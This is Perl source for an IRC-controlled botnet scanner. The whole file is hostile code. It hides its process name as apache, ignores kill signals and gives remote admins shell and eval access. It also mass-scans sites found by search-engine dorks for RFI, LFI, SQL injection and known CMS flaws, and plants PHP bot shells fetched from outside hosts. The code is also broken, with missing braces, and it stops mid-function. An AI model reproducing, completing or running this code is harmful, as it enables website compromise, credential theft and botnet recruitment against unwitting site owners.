#!

/usr/bin/perl

################################################

use HTTP::Request; #

use HTTP::Request::Common; #

use HTTP::Request::Common qw(POST); #

use LWP::Simple; #

use LWP 5.53; #

use LWP::UserAgent; #

use Socket; #

use IO::Socket; #

use IO::Socket::INET; #

use IO::Select; #

use MIME::Base64; #

################################################

my $datetime = localtime;

my $fakeproc = "/usr/sbin/apache3 -k start";

my $ircserver = "irc.byroe.net";

my $ircport = "6667";
my $nickname = "timlopus";

my $ident = "jems";

my $channel = "#kabo";

my $admin = "Susis";

my $fullname = "Susis IRC Scanner";

my $nob0dy = "#15,1(#4@#9AspAlt#15)#";

my $lfilogo = "#15,1(#4@#9LFI#15)";

my $rfilogo = "#15,1(#4@#9RFI#15)";

my $xmllogo = "#15,1(#4@#9XML#15)";

my $sqllogo = "#15,1(#4@#9SQL#15)";

my $oscologo = "#15,1(#4@#9OSCO#15)";

my $zenlogo = "#15,1(#4@#9ZEN#15)";

my $oplogo = "#15,1(#4@#9OPEN#15)";

my $lokologo = "#15,1(#4@#9LOKO#15)";

my $thumblogo = "#15,1(#4@#9TIMTHUMB#15)";

my $lficmd = '!lfi';

my $rficmd = '!rfi';
my $xmlcmd = '!xml';

my $sqlcmd = '!sql';

my $oscocmd = '!osco';

my $zencmd = '!zen';

my $lokocmd = '!loko';

my $opcmd = '!op';

my $thumbcmd = '!thumb';

my $cmdlfi = '!cmdlfi';

my $cmdxml = '!cmdxml';

my $injector = "http://www.kms4u.co.kr/data/cheditor/1704/ipays.jpg";

my $botshell = "http://apnewstime.com//wp-includes/js/byroe.jpg";

my $botshell2 = "http://apnewstime.com//wp-includes/js/allnet.jpg";

my $thumbshell = "http://blogger.com.papetariechic.ro/jack.php";

my @uagents = ("Microsoft Internet Explorer/4.0b1 (Windows 95)","Mozilla/1.22

(compatible; MSIE 1.5; Windows NT)","Mozilla/1.22 (compatible; MSIE 2.0; Windows
95)","Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)","Mozilla/4.0 (compatible;
MSIE 5.0; SunOS 5.9 sun4u; X11)","Mozilla/4.0 (compatible; MSIE 5.17;
Mac_PowerPC)","Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)","Mozilla/4.0
(compatible; MSIE 5.5; Windows NT 5.0)","Mozilla/4.0 (compatible; MSIE 6.0; MSN
2.5; Windows 98)","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;
SV1)","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR
1.1.4322)","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR
1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)","Mozilla/4.0
(compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)","Mozilla/4.0
(compatible; MSIE 7.0b; Windows NT 5.1)","Mozilla/4.0 (compatible; MSIE 7.0b;
Win32)","Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)","Microsoft Pocket
Internet Explorer/0.6","Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC;
240x320)","MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE;
Smartphone;","Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1;
rev1.1; Windows NT 5.1;)","Mozilla/4.0 (compatible; MSIE 6.0; America Online
Browser 1.1; rev1.2; Windows NT 5.1;)","Mozilla/4.0 (compatible; MSIE 6.0; America
Online Browser 1.1; rev1.5; Windows NT 5.1;)","Advanced Browser
(http://www.avantbrowser.com)","Avant Browser
(http://www.avantbrowser.com)","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;
Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR
1.1.4322)","Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux;
20020515)","Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686;
fr, fr_FR)","Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720
Minimo/0.007","Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8)
Gecko/20050511","Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12)
Gecko/20050929","Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5)
Gecko/20041202 Firefox/1.0","Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6)
Gecko/20050512 Firefox","Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8)
Gecko/20050609 Firefox/1.0.4","Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9)
Gecko/20050711 Firefox/1.0.5","Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US;
rv:1.7.10) Gecko/20050716 Firefox/1.0.6","Mozilla/5.0 (Macintosh; U; PPC Mac OS X
Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6","Mozilla/5.0 (Windows; U;
Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7","Mozilla/5.0
(Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915
Firefox/1.0.7","Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4)
Gecko/20050908 Firefox/1.4","Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US;
rv:1.8b4) Gecko/20050908 Firefox/1.4","Mozilla/5.0 (Windows; U; Windows NT 5.1; nl;
rv:1.8) Gecko/20051107 Firefox/1.5","Mozilla/5.0 (Windows; U; Windows NT 5.1; en-
GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1","Mozilla/5.0 (Windows; U; Windows
NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1","Mozilla/5.0 (BeOS; U;
BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1","Mozilla/5.0 (Windows; U;
Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1","Mozilla/5.0 (Windows;
U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1","Mozilla/5.0
(Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710
Firefox/2.0b2","Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1)
Gecko/20060918 Firefox/2.0","Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US;
rv:1.8) Gecko/20051219 SeaMonkey/1.0b","Mozilla/5.0 (Windows; U; Win98; en-US;
rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0","Mozilla/3.0 (OS/2; U)","Mozilla/3.0
(X11; I; SunOS 5.4 sun4m)","Mozilla/4.61 (Macintosh; I; PPC)","Mozilla/4.61 [en]
(OS/2; U)","Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I;
PPC)","Mozilla/4.8 [en] (Windows NT 5.0; U)");

my $uagent = $uagents[rand(scalar(@uagents))];

my $lfdtest =
"../../../../../../../../../../../../../../../../../../../../../../../../proc/self/
environ%00";

my $open_test =
"/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html";

my $loko_output = ("FCKeditor - Resources Browser");

my $open_output = ("FCKeditor - Connectors Tests");

my @tabele =
('admin','tblUsers','tblAdmin','user','users','username','usernames','usuario',

'name','names','nombre','nombres','usuarios','member','members','admin_table','miem
bro','miembros','membername','admins','administrator',

'administrators','passwd','password','passwords','pass','Pass','tAdmin','tadmin','u
ser_password','user_passwords','user_name','user_names',

'member_password','mods','mod','moderators','moderator','user_email','user_emails',
'user_mail','user_mails','mail','emails','email','address',

'e-
mail','emailaddress','correo','correos','phpbb_users','log','logins','login','regis
ters','register','usr','usrs','ps','pw','un','u_name','u_pass',

'tpassword','tPassword','u_password','nick','nicks','manager','managers','administr
ador','tUser','tUsers','administradores','clave','login_id','pwd','pas','sistema_id
',

'sistema_usuario','sistema_password','contrasena','auth','key','senha','tb_admin','
tb_administrator','tb_login','tb_logon','tb_members_tb_member',

'tb_users','tb_user','tb_sys','sys','fazerlogon','logon','fazer','authorization','m
embros','utilizadores','staff','nuke_authors','accounts','account','accnts',

'associated','accnt','customers','customer','membres','administrateur','utilisateur
','tuser','tusers','utilisateurs','password','amministratore','god','God','authors'
,

'asociado','asociados','autores','membername','autor','autores','Users','Admin','Me
mbers','Miembros','Usuario','Usuarios','ADMIN','USERS','USER','MEMBER','MEMBERS','U
SUARIO','USUARIOS','MIEMBROS','MIEMBRO');

my @kolumny =
('admin_name','cla_adm','usu_adm','fazer','logon','fazerlogon','authorization','mem
bros','utilizadores','sysadmin','email',

'user_name','username','name','user','user_name','user_username','uname','user_unam
e','usern','user_usern','un','user_un','mail',
'usrnm','user_usrnm','usr','usernm','user_usernm','nm','user_nm','login','u_name','
nombre','login_id','usr','sistema_id','author',

'sistema_usuario','auth','key','membername','nme','unme','psw','password','user_pas
sword','autores','pass_hash','hash','pass','correo',

'userpass','user_pass','upw','pword','user_pword','passwd','user_passwd','passw','u
ser_passw','pwrd','user_pwrd','pwd','authors',

'user_pwd','u_pass','clave','usuario','contrasena','pas','sistema_password','autor'
,'upassword','web_password','web_username');

$SIG{'INT'} = 'IGNORE';

$SIG{'HUP'} = 'IGNORE';

$SIG{'TERM'} = 'IGNORE';

$SIG{'CHLD'} = 'IGNORE';

$SIG{'PS'} = 'IGNORE';

$ircserver = "$ARGV[0]" if $ARGV[0];

$0 = "$fakeproc"."\0" x 16;;

my $pid = fork;

exit if $pid;

die "\n[!] Something Wrong !!!: $!\n\n" unless defined($pid);

our %irc_servers;

our %DCC;

my $dcc_sel = new IO::Select->new();

$sel_client = IO::Select->new();
sub sendraw {

if ($#_ == '1') {

my $socket = $_[0];

print $socket "$_[1]\n";

} else {

print $IRC_cur_socket "$_[0]\n";

sub connector {

my $mynick = $_[0];

my $ircserver_con = $_[1];

my $ircport_con = $_[2];

my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp",
PeerAddr=>"$ircserver_con", PeerPort=>$ircport_con) or return(1);

if (defined($IRC_socket)) {

$IRC_cur_socket = $IRC_socket;

$IRC_socket->autoflush(1);

$sel_client->add($IRC_socket);

$irc_servers{$IRC_cur_socket}{'host'} = "$ircserver_con";
 $irc_servers{$IRC_cur_socket}{'port'} = "$ircport_con";

$irc_servers{$IRC_cur_socket}{'nick'} = $mynick;

$irc_servers{$IRC_cur_socket}{'myip'} = $IRC_socket->sockhost;

nick("$mynick");

my $versi = "##9,1[#!#]# ###1,15 ##M##aza ##C##reW ##9,1 #[#!#]#";

sendraw("USER $ident ".$IRC_socket->sockhost." $ircserver_con :$versi");

sleep (1);}}

sub parse {

my $servarg = shift;

if ($servarg =~ /^PING \:(.*)/) {

sendraw("PONG :$1");

elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {

if (lc($1) eq lc($mynick)) {

$mynick = $4;

$irc_servers{$IRC_cur_socket}{'nick'} = $mynick;

elsif ($servarg =~ m/^\:(.+?)\s+433/i) {

nick("$mynick".int rand(1));
 }

elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {

$mynick = $2;

$irc_servers{$IRC_cur_socket}{'nick'} = $mynick;

$irc_servers{$IRC_cur_socket}{'nome'} = "$1";

sendraw("MODE $mynick +i");

sendraw("JOIN $channel");

sleep(2);

sendraw("PRIVMSG $admin :Hi $admin im here !!!");

my $line_temp;

while( 1 ) {

while (!(keys(%irc_servers))) { &connector("$nickname", "$ircserver",

"$ircport"); }

select(undef, undef, undef, 0.01);;

delete($irc_servers{''}) if (defined($irc_servers{''}));

my @ready = $sel_client->can_read(0);

next unless(@ready);

foreach $fh (@ready) {

 $IRC_cur_socket = $fh;

$mynick = $irc_servers{$IRC_cur_socket}{'nick'};

$nread = sysread($fh, $ircmsg, 4096);

if ($nread == 0) {

$sel_client->remove($fh);

$fh->close;

delete($irc_servers{$fh});

@lines = split (/\n/, $ircmsg);

$ircmsg =~ s/\r\n$//;

if ($ircmsg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {

my ($nick,$ident,$host,$path,$msg) = ($1,$2,$3,$4,$5);

my $engine
="GooGLe,ReDiff,Bing,ALtaViSTa,AsK,UoL,CluSty,GutSer,GooGle2,ExaLead,VirgiLio,WebDe
,AoL,SaPo,DuCk,YauSe,BaiDu,KiPoT,GiBLa,YahOo,HotBot,LyCos,LyGo,BLacK,oNeT,SiZuka,Wa
LLa,DeMos,RoSe,SeZnaM,TisCali,NaVeR";

if ($path eq $mynick) {

if ($msg =~ /^#PING (.*)#/) {

sendraw("NOTICE $nick :#PING $1#");

if ($msg =~ /^#VERSION#/) {
 sendraw("NOTICE $nick :VERSION mIRC v6.17 Khaled Mardam-Bey");

if ($msg =~ /^#TIME#/) {

sendraw("NOTICE $nick :#TIME ".$datetime."#");

if (&isAdmin($nick) && $msg eq "!die") {

&shell("$path","kill -9 $$");

if (&isAdmin($nick) && $msg eq "!killall") {

&shell("$path","killall -9 perl");

if (&isAdmin($nick) && $msg eq "!reset") {

sendraw("QUIT :Restarting...");

if (&isAdmin($nick) && $msg =~ /^!join \#(.+)/) {

sendraw("JOIN #".$1);

if (&isAdmin($nick) && $msg =~ /^!part \#(.+)/) {

sendraw("PART #".$1);
 }

if (&isAdmin($nick) && $msg =~ /^!nick (.+)/) {

sendraw("NICK ".$1);

if (&isAdmin($nick) && $msg =~ /^!pid/) {

sendraw($IRC_cur_socket, "PRIVMSG $nick :#9,1Fake Process/PID :

$fakeproc - $$");

if (&isAdmin($nick) && $msg !~ /^!/) {

&shell("$nick","$msg");

if (&isAdmin($nick) && $msg=~ /^$cmdlfi\s+(.*?)\s+(.*)/){

my $url = $1.$lfdtest;

my $cmd = $2;

&cmdlfi($url,$cmd,$nick);

if (&isAdmin($nick) && $msg=~ /^$cmdxml\s+(.*?)\s+(.*)/){

my $url = $1;

my $cmd = $2;

&cmdxml($url,$cmd,$nick);

}
}

else {

if (&isAdmin($nick) && $msg eq "!die") {

&shell("$path","kill -9 $$");

if (&isAdmin($nick) && $msg eq "!killall") {

&shell("$path","killall -9 perl");

if (&isAdmin($nick) && $msg eq "!reset") {

sendraw("QUIT :Restarting...");

if (&isAdmin($nick) && $msg =~ /^!join \#(.+)/) {

sendraw("JOIN #".$1);

if (&isAdmin($nick) && $msg eq "!part") {

sendraw("PART $path");

if (&isAdmin($nick) && $msg =~ /^!part \#(.+)/) {

sendraw("PART #".$1);
 }

if (&isAdmin($nick) && $msg =~ /^\.sh (.*)/) {

&shell("$path","$1");

if (&isAdmin($nick) && $msg =~ /^$mynick (.*)/) {

&shell("$path","$1");

if (&isAdmin($nick) && $msg =~ /^!eval (.*)/) {

eval "$1";

##################################################################### HIT

if ($msg=~ /^$cmdlfi\s+(.+?)\s+(.*)/){

my $url = $1.$lfdtest;

my $cmd = $2;

&cmdlfi($url,$cmd,$path);

if ($msg=~ /^$cmdxml\s+(.+?)\s+(.*)/){

my $url = $1;

my $cmd = $2;
&cmdxml($url,$cmd,$path);

##################################################################### HELP COMMAND

if ($msg=~ /^!help/) {

my $helplogo = "#15,1(#4@#9Help#15)";

&msg("$path","$helplogo #14
######################9[HELP]#14###############################");

&msg("$path","$helplogo #7 ( $rficmd|$lficmd|$sqlcmd|$xmlcmd|
$thumbcmd [bug][dork]|!portscan[ip][port]) )#");

&msg("$path","$helplogo #7 ( $cmdlfi|$cmdxml) [target][cmd] )

#");

&msg("$path","$helplogo #7 ( $zencmd | $oscocmd | $lokocmd |

$opcmd [dork] ) #");sleep(2);

&msg("$path","$helplogo #7 ( !about|!engine|!version|!pid )#");

&msg("$path","$helplogo #14 #######################9[END

HELP]#14##########################");

if ($msg=~ /^!engine/) {

my $enginelogo = "#15,1(#4@#9EnginE#15)";

&msg("$path","$enginelogo #4
GooGLe,ReDiff,Bing,ALtaViSTa,AsK,UoL,CluSty,GutSer,GooGle2,ExaLead,VirgiLio#");
 &msg("$path","$enginelogo #4
WebDe,AoL,SaPo,DuCk,YauSe,BaiDu,KiPoT,GiBLa,YahOo,HotBot,LyCos,LyGo#");

&msg("$path","$enginelogo #4
BLacK,oNeT,SiZuka,WaLLa,DeMos,RoSe,SeZnaM,TisCali,NaVeR#");

if ($msg=~ /^!about/) {

my $aboutlogo = "#15,1(#4@#9About Bot#15)";

&msg("$path","$aboutlogo #9Nob0dy Priv8 Scanner SE v1.2 Coded

by Vrs-hCk#");

&msg("$path","$aboutlogo #13CoDeD by c0li ByroeNet#");

&msg("$path","$aboutlogo #7Modified by ipays ByroeNet#");

if ($msg=~ /^!version/) {

my $versionlogo = "#15,1(#4@#9Version#15)";

&msg("$path","$versionlogo #13 priv8 SE v1.2#");

if ($msg=~ /^!respon/ || $msg=~ /^!id/) {

if (&isFound($injector,"html")) {

&msg("$path","#15,1(#4@#9Injector#15)#13 PHP Shell

#9READY!!!");

} else {

&msg("$path","#15,1(#4@#9Injector#15)#13 PHP Shell

#4LOST!!!");
 }

if (&isAdmin($nick) && $msg =~ /^!pid/) {

&notice("$nick","#9,1Fake Process/PID : #8$fakeproc - $$");

##################################################################### RFI SCAN

if ($msg=~ /^$rficmd\s+(.+?)\s+(.*)/) {

if (my $pid = fork) {

waitpid($pid, 0);

else {

if (fork) { exit; } else {

if (&isFound($injector,"SkFOQ09L=")) {

my ($bug,$dork) = ($1,$2);

&msg("$path","$rfilogo #9Dork :#4 $dork");

&msg("$path","$rfilogo #13Bugz :#4 $bug");

&msg("$path","$rfilogo #8Search Engine Loading ...");

&scan_start($path,$bug,$dork,$engine,1);
 } else {

&msg("$path","[# $nick #] $rfilogo #4PHP Shell Not

Found!");

exit;

##################################################################### LFI SCAN

if ($msg=~ /^$lficmd\s+(.+?)\s+(.*)/) {

if (my $pid = fork) {

waitpid($pid, 0);

else {

if (fork) { exit; } else {

if (&isFound($injector,"SkFOQ09L=")) {

my ($bug,$dork) = ($1,$2);

&msg("$path","$lfilogo #9Dork :#4 $dork");

 &msg("$path","$lfilogo #13Bugz :#4 $bug");

&msg("$path","$lfilogo #8Search Engine

Loading ...");

&scan_start($path,$bug,$dork,$engine,2);

} else {

&msg("$path","[# $nick #] $lfilogo #4PHP Shell Not

Found!");

exit;

##################################################################### XML SCAN

if ($msg=~ /^$xmlcmd\s+(.*?)\s+(.*)/ ) {

if (my $pid = fork) {

waitpid($pid, 0);

else {

if (fork) { exit; } else {

if (&isFound($injector,"SkFOQ09L=")) {
 my ($bug,$dork) = ($1,$2);

&msg("$path","$xmllogo #9Dork :#4 $dork");

&msg("$path","$xmllogo #13Bugz :#4 $bug");

&msg("$path","$xmllogo #8Search Engine

Loading ...");

&scan_start($path,$bug,$dork,$engine,3);

} else {

&msg("$path","[# $nick #] $xmllogo #4PHP Shell Not

Found!");

exit;

##################################################################### SQL SCAN

if ($msg=~ /^$sqlcmd\s+(.+?)\s+(.*)/) {

if (my $pid = fork) {

waitpid($pid, 0);
 }

else {

if (fork) { exit; } else {

my ($bug,$dork) = ($1,$2);

&msg("$path","$sqllogo #9Dork :#4 $dork");

&msg("$path","$sqllogo #13Bugz :#4 $bug");

&msg("$path","$sqllogo #8Search Engine Loading ...");

&scan_start($path,$bug,$dork,$engine,4);

exit;

##################################################################### OSCO SCAN

if ($msg=~ /^$oscocmd\s+(.*)/) {

if (my $pid = fork) {

waitpid($pid, 0);

else {
 if (fork) { exit; } else {

if (&isFound($injector,"SkFOQ09L=")) {

my ($bug,$dork) = ("admin/categories.php/login.php?
cPath=&action=new_product_preview",$1);

&msg("$path","$oscologo #9Dork :#4 $dork");

&msg("$path","$oscologo #8Search Engine Loading ...");

&scan_start($path,$bug,$dork,$engine,5);

} else {

&msg("$path","[# $nick #] $oscologo #4PHP Shell Not

Found!");

exit;

##################################################################### OSCO SCAN

if ($msg=~ /^$oscocmd\s+(.*)/) {

if (my $pid = fork) {

waitpid($pid, 0);
 }

else {

if (fork) { exit; } else {

if (&isFound($injector,"SkFOQ09L=")) {

my ($bug,$dork) = ("admin/file_manager.php/login.php",
$1);

&scan_start($path,$bug,$dork,$engine,5);

} else {

&msg("$path","[# $nick #] $oscologo #4PHP Shell Not

Found!");

exit;

##################################################################### LOKO SCAN

if ($msg=~ /^$lokocmd\s+(.*)/) {

if (my $pid = fork) {

waitpid($pid, 0);
 }

else {

if (fork) { exit; } else {

my ($bug,$dork) = ("filemanager/browser.html",$1);

&msg("$path","$lokologo #9Dork :#4 $dork");

&msg("$path","$lokologo #8Search Engine Loading ...");

&scan_start($path,$bug,$dork,$engine,6);

exit;

##################################################################### OPENCART SCAN

if ($msg=~ /^$opcmd\s+(.+?)\s+(.*)/) {

if (my $pid = fork) {

waitpid($pid, 0);

else {

if (fork) { exit; } else {

 my ($bug,$dork) = ($1,$2);

&msg("$path","$oplogo #9Dork :#4 $dork");

&msg("$path","$oplogo #13Bugz :#4 $bug");

&msg("$path","$oplogo #8Search Engine Loading ...");

&scan_start($path,$bug,$dork,$engine,7);

exit;

##################################################################### ZEN SCAN

if ($msg=~ /^$zencmd\s+(.*)/) {

if (my $pid = fork) {

waitpid($pid, 0);

else {

if (fork) { exit; } else {

my ($bug,$dork) =
("admin/sqlpatch.php/password_forgotten.php?action=execute",$1);

&msg("$path","$zenlogo #9Dork :#4 $dork");

 &msg("$path","$zenlogo #13Search Engine Loading ...");

&scan_start($path,$bug,$dork,$engine,8);

exit;

##################################################################### ZEN SCAN

if ($msg=~ /^$zencmd\s+(.*)/) {

if (my $pid = fork) {

waitpid($pid, 0);

else {

if (fork) { exit; } else {

my ($bug,$dork) = ("admin/record_company.php",$1);

&scan_start($path,$bug,$dork,$engine,8);

exit;

}
##################################################################### TIMTHUMB.PHP
SCAN (ADDED)

if ($msg=~ /^$thumbcmd\s+(.+?)\s+(.*)/) {

if (my $pid = fork) {

waitpid($pid, 0);

else {

if (fork) { exit; } else {

my ($bug,$dork) = ($1,$2);

&msg("$path","$thumblogo #9Dork :#4 $dork");

&msg("$path","$thumblogo #13Bugz :#4 $bug");

&msg("$path","$thumblogo #8Search Engine Loading ...");

&scan_start($path,$bug,$dork,$engine,9);

exit;

#####################################################################

}
}

for(my $c=0; $c<= $#lines; $c++) {

$line = $lines[$c];

$line = $line_temp.$line if ($line_temp);

$line_temp = '';

$line =~ s/\r$//;

unless ($c == $#lines) {

&parse("$line");

} else {

if ($#lines == 0) {

&parse("$line");

} elsif ($lines[$c] =~ /\r$/) {

&parse("$line");

} elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {

&parse("$line");

} else {

$line_temp = $line;

}
 }

#########################################

sub type () {

my ($chan,$bug,$dork,$engine,$type) = @_;

if ($type == 1){&rfi($chan,$bug,$dork,$engine);}

elsif ($type == 2){&lfi($chan,$bug,$dork,$engine);}

elsif ($type == 3){&xml($chan,$bug,$dork,$engine);}

elsif ($type == 4){&sql($chan,$bug,$dork,$engine);}

elsif ($type == 5){&osco($chan,$bug,$dork,$engine);}

elsif ($type == 6){&loko($chan,$bug,$dork,$engine);}

elsif ($type == 7){&op($chan,$bug,$dork,$engine);}

elsif ($type == 8){&zen($chan,$bug,$dork,$engine);}

elsif ($type == 9){&thumb($chan,$bug,$dork,$engine);}

sub scan_start() {

my ($chan,$bug,$dork,$engine,$type) = @_;
 if ($engine =~ /google/i) {

if (my $pid = fork) { waitpid($pid, 0); }

else { if (fork) { exit; } else {

&type($chan,$bug,$dork,"GooGLe",$type);

} exit; }

if ($engine =~ /google2/i) {

if ($pid = fork) { waitpid($pid, 0); }

else { if (fork) { exit; } else {

&type($chan,$bug,$dork,"GooGle2",$type);

} exit; }

if ($engine =~ /bing/i) {

if ($pid = fork) { waitpid($pid, 0); }

else { if (fork) { exit; } else {

&type($chan,$bug,$dork,"Bing",$type);

} exit; }

}
 if ($engine =~ /altavista/i) {

if ($pid = fork) { waitpid($pid, 0); }

else { if (fork) { exit; } else {

&type($chan,$bug,$dork,"ALtaViSTa",$type);

} exit; }

if ($engine =~ /ask/i) {

if ($pid = fork) { waitpid($pid, 0); }

else { if (fork) { exit; } else {

&type($chan,$bug,$dork,"AsK",$type);

} exit; }

if ($engine =~ /uol/i) {

if ($pid = fork) { waitpid($pid, 0); }

else { if (fork) { exit; } else {

&type($chan,$bug,$dork,"UoL",$type);

} exit; }
 }

if ($engine =~ /yahoo/i) {

if ($pid = fork) { waitpid($pid, 0); }

else { if (fork) { exit; } else {

&type($chan,$bug,$dork,"YahOo",$type);

} exit; }

if ($engine =~ /clusty/i) {

if ($pid = fork) { waitpid($pid, 0); }

else { if (fork) { exit; } else {

&type($chan,$bug,$dork,"CluSty",$type);

} exit; }

if ($engine =~ /gutser/i) {

if ($pid = fork) { waitpid($pid, 0); }

else { if (fork) { exit; } else {

 &type($chan,$bug,$dork,"GutSer",$type);

} exit; }

if ($engine =~ /rediff/i) {

if ($pid = fork) { waitpid($pid, 0); }

else { if (fork) { exit; } else {

&type($chan,$bug,$dork,"ReDiff",$type);

} exit; }

if ($engine =~ /virgilio/i) {

if ($pid = fork) { waitpid($pid, 0); }

else { if (fork) { exit; } else {

&type($chan,$bug,$dork,"VirgiLio",$type);

} exit; }

if ($engine =~ /webde/i) {

if ($pid = fork) { waitpid($pid, 0); }

 else { if (fork) { exit; } else {

&type($chan,$bug,$dork,"WebDe",$type);

} exit; }

if ($engine =~ /exalead/i) {

if ($pid = fork) { waitpid($pid, 0); }

else { if (fork) { exit; } else {

&type($chan,$bug,$dork,"ExaLead",$type);

} exit; }

if ($engine =~ /lycos/i) {

if ($pid = fork) { waitpid($pid, 0); }

else { if (fork) { exit; } else {

&type($chan,$bug,$dork,"LyCos",$type);

} exit; }

if ($engine =~ /hotbot/i) {
 if ($pid = fork) { waitpid($pid, 0); }

else { if (fork) { exit; } else {

&type($chan,$bug,$dork,"HotBot",$type);

} exit; }

if ($engine =~ /aol/i) {

if ($pid = fork) { waitpid($pid, 0); }

else { if (fork) { exit; } else {

&type($chan,$bug,$dork,"AoL",$type);

} exit; }

if ($engine =~ /sapo/i) {

if ($pid = fork) { waitpid($pid, 0); }

else { if (fork) { exit; } else {

&type($chan,$bug,$dork,"SaPo",$type);

} exit; }

}
 if ($engine =~ /duck/i) {

if ($pid = fork) { waitpid($pid, 0); }

else { if (fork) { exit; } else {

&type($chan,$bug,$dork,"DuCk",$type);

} exit; }

if ($engine =~ /lygo/i) {

if ($pid = fork) { waitpid($pid, 0); }

else { if (fork) { exit; } else {

&type($chan,$bug,$dork,"LyGo",$type);

} exit; }

if ($engine =~ /yause/i) {

if ($pid = fork) { waitpid($pid, 0); }

else { if (fork) { exit; } else {

&type($chan,$bug,$dork,"YauSe",$type);

} exit; }
 }

if ($engine =~ /baidu/i) {

if ($pid = fork) { waitpid($pid, 0); }

else { if (fork) { exit; } else {

&type($chan,$bug,$dork,"BaiDu",$type);

} exit; }

if ($engine =~ /kipot/i) {

if ($pid = fork) { waitpid($pid, 0); }

else { if (fork) { exit; } else {

&type($chan,$bug,$dork,"KiPoT",$type);

} exit; }

if ($engine =~ /gibla/i) {

if ($pid = fork) { waitpid($pid, 0); }

else { if (fork) { exit; } else {

&type($chan,$bug,$dork,"GiBLa",$type);
 } exit; }

if ($engine =~ /black/i) {

if ($pid = fork) { waitpid($pid, 0); }

else { if (fork) { exit; } else {

&type($chan,$bug,$dork,"BLacK",$type);

} exit; }

if ($engine =~ /onet/i) {

if ($pid = fork) { waitpid($pid, 0); }

else { if (fork) { exit; } else {

&type($chan,$bug,$dork,"oNeT",$type);

} exit; }

if ($engine =~ /sizuka/i) {

if ($pid = fork) { waitpid($pid, 0); }

 else { if (fork) { exit; } else {

&type($chan,$bug,$dork,"SiZuka",$type);

} exit; }

if ($engine =~ /walla/i) {

if ($pid = fork) { waitpid($pid, 0); }

else { if (fork) { exit; } else {

&type($chan,$bug,$dork,"WaLLa",$type);

} exit; }

if ($engine =~ /demos/i) {

if ($pid = fork) { waitpid($pid, 0); }

else { if (fork) { exit; } else {

&type($chan,$bug,$dork,"DeMos",$type);

} exit; }

if ($engine =~ /rose/i) {
 if ($pid = fork) { waitpid($pid, 0); }

else { if (fork) { exit; } else {

&type($chan,$bug,$dork,"RoSe",$type);

} exit; }

if ($engine =~ /seznam/i) {

if ($pid = fork) { waitpid($pid, 0); }

else { if (fork) { exit; } else {

&type($chan,$bug,$dork,"SeZnaM",$type);

} exit; }

if ($engine =~ /tiscali/i) {

if ($pid = fork) { waitpid($pid, 0); }

else { if (fork) { exit; } else {

&type($chan,$bug,$dork,"TisCali",$type);

} exit; }

}
if ($engine =~ /naver/i) {

if ($pid = fork) { waitpid($pid, 0); }

else { if (fork) { exit; } else {

&type($chan,$bug,$dork,"NaVeR",$type);

} exit; }

#########################################

sub rfi() {

my $chan = $_[0];

my $bug = $_[1];

my $dork = $_[2];

my $engine = $_[3];

my $count = 0;

my @list = &search_engine($chan,$bug,$dork,$engine,$rfilogo);

my $num = scalar(@list);

if ($num > 0) {
 foreach my $site (@list) {

$count++;

if ($count == $num-1) { &msg("$chan","$rfilogo(#4@#9$engine#15)#10 Scan finish"); }

my $coba = "http://".$site.$bug."test??";

my $test = "http://".$site.$bug.$injector."??";

my $dor = "http://".$site.$bug.$botshell."??";

my $dor2 = "http://".$site.$bug.$botshell2."??";

my $cek = &get_content($coba);sleep(1);

&get_content($dor);sleep(1);

&get_content($dor2);sleep(1);

if ($cek =~ /failed to open stream/i) {

if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {

&rfi_xpl($test,$chan,$site);

exit;}

}
sub rfi_xpl() {

